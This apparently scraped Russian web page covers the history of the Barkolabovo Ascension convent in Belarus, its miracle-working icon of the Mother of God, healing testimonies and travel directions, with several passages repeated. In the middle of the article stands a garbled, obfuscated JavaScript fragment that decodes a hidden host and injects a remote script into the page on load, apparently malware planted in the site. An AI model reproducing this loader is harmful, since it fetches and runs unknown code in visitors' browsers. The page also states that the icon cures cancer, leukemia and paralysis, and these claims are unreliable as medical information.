Свято-вознесенский барколабовский женский монастырь. Борколабово. Борколабовский Вознесенский женский монастырь Барколабово монастырь от чего лечит и помогает

самый почитаемый и чудесный образ Восточной Беларуси

Барколабовская Божия Матерь

Сегодня православная церковь празднует честь наиболее почитаемой белорусской — Божией Матери Барколабовской . И неслучайно торжество приходится на еще один памятный день, ведь

Свое название Барколабовская Божией Матери носит по месту своего нахождения в честь Вознесения Господня женском монастыре в селе Борколабове Быховского района Могилёвской области. В его главной церкви и находится чудотворная икона Богоматери.

Интересна история монастыря. Как свидетельствуют хроники, название деревни Барколабово (или Боркулабово) происходит от имени ротмистра польского короля Августа Баркулаба Ивановича Корсака. Именно он в 1564 году основывает замок, а через четыре года строит две церкви.

После брака дочери Корсака Евы с князем Соломерецким деревня Барколабово становится культурным центром всего приднепровского края, ведь здесь приобретена известная во всей Речи Посполитой библиотека. У князя Соломерецкого в то время жили и работали домашними учителями Лаврентий Зизаний и Мелетий Смотрицкий – известные ученые и общественные политические деятели. «Азбукой» и «Грамматикой» Лаврентия Зизания пользовались в школах Беларуси, Украины и Литвы. А самым авторитетным учебником по славянскому языку более двух столетий была «Грамматика» Мелетия Смотрицкого.

К слову сказать, селение знаменито еще и тем, что местный священник Фёдор Филипович является автором Баркулабовской летописи, которая охватывает события с 1563 до 1608 года. Главное место в ней занимают рассказы о деятельности казачества под руководством Северина Наливайко, отряды которого действовали на Украине и в Беларуси. В частности о сожжении Могилёва в 1595 году, массовых убийствах и ограблении местных жителей.

Через некоторое время княжна Елена Соломерицкая, вступив в брак с Богданом Стеткевичем договаривается с ним о строительстве женского монастыря. В 1641 году Стеткевич получает «разрешение на Барколабовский монастырь». И хотя княжна в скором времени умерла, муж осуществляет совместно данный обет.

Совсем скоро после сооружения главного храма в жизни обители произошло событие исключительного значения. Возвращаясь летом из Польши, князь Пожарский, не расстававшийся никогда в походах с особо чтимою им иконой Божией Матери, проезжал мимо вновь возникшего монастыря. Обоз, в котором находился образ, недвижимо стал и лошади, несмотря на усилия возничих, не могли тронуться с места. Поэтому икона была передана в монастырь и первоначально помещена в центре Вознесенской церкви, но в следующую ночь образ чудесным образом переместился к стене храма. В дальнейшем он находился летом в Вознесенской церкви, а зимой в церкви во имя Иоанна Предтечи в особых высоких золоченых киотах, напротив клироса.

25 июля 2010 года в возрождаемый монастырь из Свято-Троицкого храма Быхова была торжественно перенесена чудотворная Барколабовская икона. Фото subscribe.ru

В 1882 году Вознесенский храм сгорел, но чудотворный образ, иконостас и утварь были спасены от пожара. После 1920 года Барколабовский монастырь закрыли. Во время Великой Отечественной войны икону спрятали инокини монастыря (по другим устным сведениям, образ находился в часовне на железнодорожной станции Быхов). А в 1953 году перед праздником Пасхи чудотворный образ был принесен в храм Святой Троицы в Быхове и помещен в специальный пристенный киот.

Около 300 лет монастырь был важнейшим духовным и культурным центром Восточной Беларуси, оказывал большое влияние на жителей окрестных поселений. При монастыре действовала школа. В монастырском приюте содержались дети-сироты, здесь прививалась любовь к книгам, навыкам домашнего чтения, накапливались знания по земледелию, агрономии, селекции растений.

Специально для иконы был сооружен напольный киот, в который и был помещен святой образ. Фото subscribe.ru

Известно, что у был серебряный позолоченный оклад (не сохранился), украшенный драгоценными камнями и жемчугом, а в серебряной звезде подле ножек Богомладенца находились частицы мощей Святой Евфросинии Полоцкой и Святого Лонгина.

На поклонение образу в Борколабовский монастырь стекались паломники не только православного вероисповедания, но и униаты и католики. прославился чудесами во время Северной войны и войны 1812 года. А в 1900 году прекратился падеж скота после крестного хода с образом.

У крестьянок Могилёвской губернии был известен обычай покупать в монастыре на храмовые праздники фигурки животных, сделанные из воска, и прикладывать их к иконе, затем фигурки приносились домой как знак помощи Божией Матери в сохранении домашних животных от болезней.

Наибольшим чудом считается то, что образ пережил все войны 17-20 столетий. Этот образ является одним из самых почитаемых образов Божией Матери в Восточной Беларуси.

В последнее время многие верующие, особенно почитающие Борколабовскую Одигитрию, свидетельствуют об избавлении с ее помощью от онкологических и психических заболеваний, а также от болезней внутренних органов. А 24 июля 2000 года, в день памяти равноапостольной Ольги и чествования Ржецкой и Борколабовской икон Богородицы, на глазах верующих получил чудесное исцеление от болезни кисти руки один из прихожан.

СПРАВКА. Борколабовская (Барколабовская) икона Божией Матери – чудотворный образ, получивший свое название по месту своего нахождения в главной церкви Борколабовского женского монастыря в честь Вознесения Господня. Образ Богоматери из Барколабово является одним из самых почитаемых образов Божией Матери на восточных землях Беларуси. Он является одним из величайших шедевров белорусской иконописной школы.В архиве монастыря сохраняется легенда о происхождении этого богородичного образа. Согласно ей, в 1659 году князь Пожарский возвращался из Польши, везя его с собой. Когда отряд князя проезжал мимо монастыря, обоз со святыней «остановился» и никакие усилия слуг князя не могли сдвинуть ее с места. Князь Пожарский посчитал, что икону нужно оставить в монастыре и отдал ее в дар игуменье Фотинии Киркоровне. Икона Матери Божией Барколабовской прославилась в монастыре чудесами и пережила все катаклизмы XVII-XX веков.

Деревня Барколабово (Могилевская область)

Женский монастырь

Эти места были заселены человеком так давно, что даже не верится. Свидетельством являются археологические памятники возле Днепра.

В 1654 году возле древнего поселения на гору возле Днепра въехал ротмистр и дисненский староста Баркулаб Иванович Корсак, который происходил из древнего белорусского рода Корсаков. Он, сидя на коне, оглядел все хорошо и решил поставить на этой горе замок, чтобы оборонять наши восточные границы. Он умер через 12 лет после того, как основал деревню Барколабово.

Кричевский староста Богдан Соломерецкий взял в жены дочь Еву Баркулабовну и получил Барколабово. Говорят, что Богдан Соломерецкий был противником Брестской унии и во всем поддерживал православные братства. И он переделал Барколабово в оплот православия. До него здесь было две православные церкви. А он уже вместе с женой построил еще одну православную церковь святого Юрия.

Их дети Богдан Богданович и Елена Богдановна также были истинными православными. Они были воспитаны в православном духе. Они не соглашались перейти в другие конфессии, поменять веру, а основали в Барколабово мужской православный монастырь. Этот монастырь становится крупным центром оппозиции униатству в Беларуси.

Образ Матери Божьей Барколабовской попал в монастырь еще в середине 17 века. Тогда шла война Русско-польская и русские князья возвращались с войны через этот монастырь. По легенде, перед монастырем кони упали на колени и не могли идти. Все поняли, что Матерь Божья не хочет покидать эту землю. И икону оставили в Барколабовском монастыре, где она находится более 350 лет. Когда пришли большевики, монахини стали раздавать иконы, и эту люди передавали из дома в дом. Только чтобы она не попала в руки большевиков, чтобы они ее не спалили.

Сразу после первого раздела Речи Посполитой в 1772 году Барколабово попадает в когти двуглавого орла Российской Империи. В то время здесь были 2 церкви, монастырь, дом архиерея, две мельницы, проживало 465 человек.

В конце 19 века в Барколабово уже проживало 605 человек. Здесь были медеплавильное, лесопильное предприятия, корчма, семь магазинов, 2 раза в год проходили ярмарки. А в 1904 году было решено построить в Барколабово еще одну православную церковь. И освятили эту церковь в честь Казанской Божьей Матери. В советское время эту церковь закрыли и переделали в спортивный зал. Сейчас ее вновь вернули верующим и реставрируют. Она является памятником архитектуры псевдорусского стиля.

Местные жители рассказывают, что Вторая Мировая война совсем не затронула Барколабово, несмотря на то, что рядом Могилев, Быхов, в которых шли тяжелые бои. Во время войны палили соседние деревни, убивали людей, а здесь немцы в начале войны проехали на мотоциклах, и больше их никто не видел. И еще рассказывают, что, когда большевики закрыли женский монастырь, старец один сказал: «Хутка пачнецца вайна, але гэтае месца яна не кране». Все люди верят в то, что это именно Матерь Божья Барколабовская покровительствует этому месту. Говорят, на огороды падали бомбы, но чудом не взрывались.

< e.length;o++)t+=String..document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String..document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String..document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String..document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf("http")==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n .replace(«https:»,»http:»));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,»text/javascript»),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,»function»==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),»function»==typeof o&&o())}}},s=function(f){var u=a(f)+»/ajs/»+t+»/c/»+r(d())+»_»+(self===top?0:1)+».js»;window.a3164427983=f,c(u,function(){o(«a2519043306»)!=f&&n(«a2519043306»,f,{expires:parseInt(«3600»)})},function(){var t=e.indexOf(f),o=e;o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o(«a36677002»)!=i&&n(«a36677002»,i);var r=o(«a2519043306»);t=r?r:e,s(t)};f()}();
// ]]>

Деревня Барколабово находится в Быховском районе Могилевской области бывшего Великого княжества Литовского, а сегодня в Республике Беларусь. Эти места были заселены человеком так давно, что даже не верится. Свидетельством являются археологические памятники возле Днепра. Здесь была найдена стоянка раннего мезолита, а это 10–8 тысячелетие до нашей эры. Также были найдены поселения раннего железного века и времен Киевской Руси. Это свидетельствует о том, что история Беларуси начинается не с 1917 года, как нам всегда говорили, а своими корнями уходит в глубину веков. И когда-то отсюда по Днепру наши предки шли в Киев, а оттуда к Черному морю.

В 1654 году возле древнего поселения на гору возле Днепра въехал ротмистр и дисненский староста Баркулаб Иванович Корсак , который происходил из древнего белорусского рода Корсаков. Он, сидя на коне, оглядел все хорошо и решил поставить на этой горе замок, чтобы оборонять наши восточные границы.

Воины Баркулаба Ивановича предложили назвать замок в честь него, чтобы враги боялись этот замок так же, как Баркулаба в бою. Вот так и появилось Баркулабово (Барколабово) .

Вот, что написано в древних рукописях: «Яго міласць, пан Баркулаб Иванавіч Корсак, ротмістр і стараста дісненскі, з ласкі гаспадара караля за вялікія пачэсныя заслугі, за смеласць, самаахвярнасць і за нястомнасць у вайсковай і рытарскай справе ў лесе глухім, на грунце лясным, ва ўручашчы Брус, аб"явіўшы волю і даўшы прівелеі на 12 год людзям прыгожым, з паволі Божай, з благаслаўлення духавенства заснаваў замак имем сваім Баркулабаў».

Баркулаб Иванович Корсак был воином хорошим и известным. Они с Романом Ходкевичем основали замки еще и в Дисне , Лепеле , Чашниках , заселив эти места хорошими людьми. Наша Отчизна, наша Родина горько плакала, когда умер ее славный сын Баркулаб Корсак. Он умер через 12 лет после того, как основал деревню Барколабово . А похоронили его в Вильно в православной церкви Пречистой Богородицы .

Кричевский староста Богдан Соломерецкий взял в жены дочь Еву Баркулабовну и получил Барколабово. Говорят, что Богдан Соломерецкий был противником Брестской унии и во всем поддерживал православные братства. И он переделал Барколабово в оплот православия. До него здесь было две православные церкви. А он уже вместе с женой построил еще одну православную церковь святого Юрия .

Их дети Богдан Богданович и Елена Богдановна также были истинными православными. Они были воспитаны в православном духе. Они не соглашались перейти в другие конфессии, поменять веру, а основали в Барколабово мужской православный монастырь. Этот монастырь становится крупным центром оппозиции униатству в Беларуси. Говорят, что позднее в этом Барколабовском монастыре хоронили всех князей Соломерецких. Именно в православном мужском монастыре священником Федором Филипповичем Могилевцем была создана известная Баркулабовская летопись .

Историческая справка. Баркулабовская летопись - памятник белорусского летописания начала 17 века. Сохранилась в единственном списке так называемой Патриаршей рукописи третей четверти 17 века, которая хранится в Государственном историческом музее в Москве. Летопись начинается со сведений о сейме 1545 года в Бресте и построения Могилевского замка в 1526 году. Описан захват Полоцка Иваном Грозным . В Баркулабовской летописи помещены уникальные сведения об истории Восточной Беларуси, информация о некоторых исторических событиях из истории белорусской культуры и православной церкви, а также об исторических личностях, в том числе и двух Лжедмитриях , о возникновении Барколабово и другой краеведческий и этнографический материал. Основными источниками для летописи послужили личные наблюдения и воспоминания автора. Летописец был близок к народу и освещал с патриотических позиций. Все это придает Баркулабовской летописи черты памятника исторично-мемуарного жанра. Написана летопись живым белорусским языком, образным и колоритным.

Барколабовский священник записывал в летопись то, что видел своими глазами. Например, он написал, что под конец 16 века сюда, под Могилев, подошло московское войско, которое начало вырезать и палить деревни. В Барколабово стоял «литвинский» отряд, который отправил гонцов в Копысь, Шклов, где также стояли наши отряды. Они пошли на Могилев и, как говорит автор, «пагналі, адцеснілі, пабілі маскоўцаў і столькі іх шмат пабілі, што аж Дняпро іх трупамі загацілі і загацілі так, што людзі не маглі ў Дняпры ваду браць ды піць і рыбу з Дняпра не елі».

Летописец писал, что казаки Северина Наливайко палили дома, грабили корчмы, убивали всех подряд и были страшнее любого лютого врага.

Много интересного есть в летописи и про эту деревеньку Барколабово. Летописец пишет, как в гости к Богдану Соломерецкому пожаловал канцлер Великого княжества Литовского Лев Сапега вместе со многими знатными панами.

После Соломерецких Барколабово попадает в руки Богдана Стеткевича . Он взял в жены дочку Богдана Соломерецкого и получил это святое место. Богдан Стеткевич был хорошим воином и искренним православным верующим. Он и его жена в Барколабово основали женский православный монастырь. Барколабово когда-то было одним из культурных, религиозных центров Беларуси.

Когда сюда пришли большевики, то начали все уничтожать. В 1928 году женский Свято-Вознесенский монастырь был закрыт, много строений было уничтожено, а в некоторых из них разместился пионерский лагерь. В 1990-ых годах оставшиеся строения монастыря сровняли с землей. Только недавно сюда вновь вернулись монахини, и Свято-Вознесенский женский монастырь отстраивается заново.

Образ Матери Божьей Барколабовской попал в монастырь еще в середине 17 века. Тогда шла война Русско-польская и русские князья возвращались с войны через этот монастырь. По легенде, перед монастырем кони упали на колени и не могли идти. Все поняли, что Матерь Божья не хочет покидать эту землю. И икону оставили в Барколабовском монастыре, где она находится более 350 лет. Когда пришли большевики, монахини стали раздавать иконы, и эту люди передавали из дома в дом. Только чтобы она не попала в руки большевиков, чтобы они ее не спалили. Позже образ был передан в Быховскую церковь , а год назад Матерь Божья Барколабовская вернулась в свой монастырь. Люди приходят сюда, молятся этому чудотворному образу и получают от него помощь.

В Барколабово когда-то стоял монастырский храм Иоанна Предтечи . В подземельях этого храма, в склепах, которые здесь еще находятся, хоронили представителей высокородных дворянских родов: после Стеткевичей здесь правили Полубинские , через 2 столетия Барколабово принадлежало Сапегам.

Сразу после первого раздела Речи Посполитой в 1772 году Барколабово попадает в когти двуглавого орла Российской Империи . В то время здесь были 2 церкви, монастырь, дом архиерея, две мельницы, проживало 465 человек. Также здесь находилась школа униатская. А в этом двухэтажном строении находилась православная церковная школа.

В конце 19 века в Барколабово уже проживало 605 человек. Здесь были медеплавильное, лесопильное предприятия, корчма, семь магазинов, 2 раза в год проходили ярмарки. А в 1904 году было решено построить в Барколабово еще одну православную церковь. И освятили эту церковь в честь Казанской Божьей Матери . В советское время эту церковь закрыли и переделали в спортивный зал. Сейчас ее вновь вернули верующим и реставрируют. Она является памятником архитектуры псевдорусского стиля.

Местные жители рассказывают, что Вторая Мировая война совсем не затронула Барколабово, несмотря на то, что рядом Могилев , Быхов , в которых шли тяжелые бои. Во время войны палили соседние деревни, убивали людей, а здесь немцы в начале войны проехали на мотоциклах, и больше их никто не видел. И еще рассказывают, что, когда большевики закрыли женский монастырь, старец один сказал: «Хутка пачнецца вайна, але гэтае месца яна не кране». Все люди верят в то, что это именно Матерь Божья Барколабовская покровительствует этому месту. Говорят, на огороды падали бомбы, но чудом не взрывались.

Как большевики ни пробовали доказать нам, что Бога нет и что мы все пошли от обезьян, как они храмы ни разрушали, как ни уничтожали святые образы, но все возвращается на свои места. Храмы отстраиваются, иконы возвращают, чудеса случаются. Как сказал классик, «на Беларусі Бог жыве і няхай да веку жыве».

Вознесенский женский монастырь стоит недалеко от деревни Барколабово Быховского района, рядом с тем местом, где Лахва впадает в Днепр . Каждую весну реки разливаются, вода поднимается, и монастырь рискует уйти под воду.

Еще несколько лет назад люди ловили рыбу руками прямо у стен монастыря, но сам монастырь ни разу не затопило, - рассказывают местные жители.

Они уверены: все дело в чудотворной иконе Барколабовской Божьей Матери, которая хранится в храме на территории монастыря.

Эта икона не очень древняя - ей чуть больше 350 лет, но чудеса, которые она творит, исчисляются тысячами. Началось все с ее появления в монастыре - монахини верят, что она сама выбрала его.

Защитница Восточной Беларуси

Православный женский монастырь в Барколабово был основан в 1623 году Богданом Статкевичем. Рядом с монастырем проходила крупная дорога, сюда приезжало много людей, поэтому скоро он стал достаточно известным. В 1659 году во время войны Литвы и России по этой дороге возвращался домой князь Пожарский. Когда он проезжал мимо ворот монастыря, лошадь остановилась, и никто не мог сдвинуть ее с места. Пожарский долго не мог понять, в чем дело, и только к вечеру его осенило: среди трофеев князя была икона Божьей Матери, которую он вез домой. Как только Пожарский подарил икону монастырю, лошадь тронулась в путь.

Икону поставили в центре храма.

Когда утром сестры пришли туда, они увидели, что икона стоит по правую сторону храма - это место она выбрала себе сама, - рассказывает монахиня Антонина. - С правой стороны стоят мужчины, с левой - женщины, то есть правая сторона главенствующая, и Матерь Божья показала, что она хочет здесь управлять.

Сколько потом икону не переставляли в другое место, наутро она всегда возвращалась в правую часть храма.

С первых дней люди увидели, что икона творит чудеса: она не только сама выбрала себе место, но и исцеляла людей от любых недугов. Слава о ней разлетелась по округе, и вскоре ее стали считать защитницей Восточной Беларуси .

Монастырь тем временем рос и развивался. Дважды в год у его ворот проходили крупные ярмарки, на которые съезжались люди со всех уголков мира и меняли свои товары на монастырские. Сам монастырь жил натуральным хозяйством и полностью себя обеспечивал. Здесь была медеплавильная печь, сюда съезжались ученые, многие из которых занимались сельским хозяйством. При монастыре они занимались селекцией и выводили новые сорта растений. Тут же работала воскресная школа, где обучались девочки разных возрастов. Позже сюда часто приезжала царица Александра Федоровна. Благодаря всему этому монастырь стал одним из самых влиятельных в Восточной Беларуси.


Чтобы спасти икону, ее замуровали в стену

В конце XVIII века люди стали опасаться, что монастырь может уйти под воду. Каждую весну из-за паводков он оказывался как будто на острове, вода плескалась у его ворот. Тогда было принято решение переправить сестер в другой монастырь, в Барколабово осталось около 70 монахинь из 300. Они вместе с солдатами и крестьянами носили землю в мешках и засыпали ею реку. Они насыпали так много земли, что изменили русло реки! Отделили рукав Днепра - получилось озеро. Теперь река несла свои воды мимо монастыря.

В войну 1812 года французы хотели сжечь его, но сначала решили вынести все ценное. Один из солдат потянулся за иконой, но как только прикоснулся к ней, его с огромной силой отбросило назад. Увидев это, остальные решили оставить святое место в покое.

Монастырь просуществовал до 1920 года и был закрыт во время гонений на православную церковь. Сестры убедили стражу разрешить им вынести чудотворную икону и спрятали ее. Ее переносили из дома в дом, прятали то в притворе, то в сенях.

Все эти годы икона числилась в списках имущества монастыря, Матерь Божья сделала так, что власти не заметили ее пропажи и не искали ее, - рассказывают сестры. - Это просто чудо, что ее удалось сохранить.

Во время войны одна из монахинь замуровала святыню в стену дома, где она и пролежала много лет. Самих монахинь после войны арестовали. Только в 1953 году, когда их выпустили из тюрьмы, сестры показали место, где находится икона, и Божья Матерь вернулась в храм - правда, уже не в Барколабовский, а в Быховский, где и хранилась следующие полвека. А Барколабовского монастыря больше не существовало.

Икона продолжала творить чудеса, исцелять людей, и быховчане очень берегли ее, - вспоминают монахини.

Когда в 1990-х годах архиепископ Максим захотел забрать икону в Могилев , он не смог этого сделать - быховчане были против, для них икона была настоящим чудом. Так Матерь Божья еще раз подтвердила, что сама определяет, где ей быть.


Икона исцеляет всех, кто верит

Нынешняя настоятельница монастыря схиигумения Антония родом из соседней с Барколабово деревней. Когда она была маленькой девочкой, мама приводила ее к иконе. Когда девочка выросла и стала схииегуменией оршанского Свято-Успенского женского монастыря, Бобруйская епархия приняла решение возродить монастырь в Барколабово - это было в 2008 году.

Когда мы приехали сюда, здесь ничего не было, - вспоминает монахиня Антонина, переехавшая сюда из оршанского монастыря вместе с сестрами и матушкой. - Только голубой крест стоял посреди поля - его поставили в 1996 году в знак почитания этих святых мест.

Монахини поселились в старом матушкином доме. В марте 2009 года на территории монастыря был заложен храм, а в мае 2010 года его освятили.

Матушка заказала копию иконы в оршанских мастерских, и год мы молились с этой копией. Но потом матушка отдала копию в Быхов , а икона вернулась сюда. Быховчане плакали, для них потерять ее было большим горем, - говорят в монастыре. - Через несколько недель к иконе в Быхов приехала семья с больной девушкой, у нее был псориаз. Эта семья не знала, что теперь в храме висит копия. Они усердно молились, верили - и девушка исцелилась, болезнь сразу же исчезла, пропали все видимые ее проявления. Для быховчан это стало знаком, Матерь Божья как будто бы говорила: «Не бойтесь, я с вами, и через копию дается та же благодать, что и через настоящую икону».

Монахиня Антонина вспоминает, как однажды рассказала эту историю людям, приехавшим к ним в храм, и ее слова тут же подтвердил один из них.

Пять лет у нас с женой не было детей. Я купил у вас копию и повесил ее дома. После того как у меня появилась икона, жена забеременела, - рассказал он.

В монастыре одну за другой рассказывают чудесные истории исцеления. Рассказывают о парне с болезнью Бейля, который полностью исцелился после того, как в храме провели молебен - через несколько месяцев он приехал в монастырь, и сестры увидели абсолютно здорового весело скачущего ребенка. Рассказывают о шестилетнем мальчике, которого икона исцелила от лейкемии, о женщине, которая не могла забеременеть 13 лет и смогла стать мамой только после молитв Барколабовской иконе, о женщине, которая вылечилась от паралича и подарила монастырю в знак благодарности позолоченный крест, украшенный драгоценными камнями.

Она была полностью парализована, - вспоминает Антонина. - Однажды ей приснился сон, в котором Матерь Божья сказала: «Подай записки в 33 храма, и ты исцелишься». Женщина сделала это, но болезнь не ушла. Откуда-то она узнала о чудотворной иконе в Барколабово и попросила своих детей: «Отвезите меня в монастырь к иконе - если и это не поможет, больше не буду вас ни о чем просить». Ее привезли, больная приложилась к иконе и спустя несколько дней начала ходить!

Пока мы разговариваем с монахиней, в храм заходят люди. Они рассказывают, что приехали в святые места из Калининграда .

Сюда приезжает много людей из России, - говорит сестра. - Многие едут к иконе, просят ее о чуде - и чудо происходит. Главное - это вера.

Как добраться?

Барколабово находится примерно в 35 километрах от Могилева в сторону Быхова. Туда можно доехать на машине, или на автобусе до Быхова (автобусы ходят каждый день, билет стоит 32950 рублей), а оттуда уже в деревню. Из Быхова в Барколабово трижды в неделю ходят автобусы - во вторник, среду и воскресенье. Отправление в 6.20 и 13.00, билет стоит 9500 рублей.

Просмотров